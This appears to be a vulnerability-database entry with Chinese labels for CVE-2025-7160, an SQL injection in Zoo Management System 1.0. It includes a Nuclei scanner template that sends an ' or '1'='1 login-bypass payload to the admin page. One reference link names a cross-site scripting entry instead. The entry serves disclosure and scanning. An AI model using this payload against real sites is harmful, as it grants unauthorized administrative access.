CVE-2025-7160: Zoo Management System 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: Zoo Management System | POC: 已公开

漏洞描述

Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2025-7160

info:
  name: Zoo Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/48880
    - https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-7160
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-7160
    epss-score: 0.04944
    epss-percentile: 0.89148
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,edb,packetstorm,zms,sqli,auth-bypass,cms,vuln

http:
  - raw:
      - |
        POST /admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+or+%271%27%3D%271&password=any&login=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ZMS ADMIN'
          - 'Dashboard'
          - 'Zoo Management System'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100be6ce0b3db5152b92eb2255df23e06e36d26ebcec15a7b4555785418aba92817022100d09f9ca75056d005007007831e3a3502c96c843b3d556d2ffc8382907cd2075c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐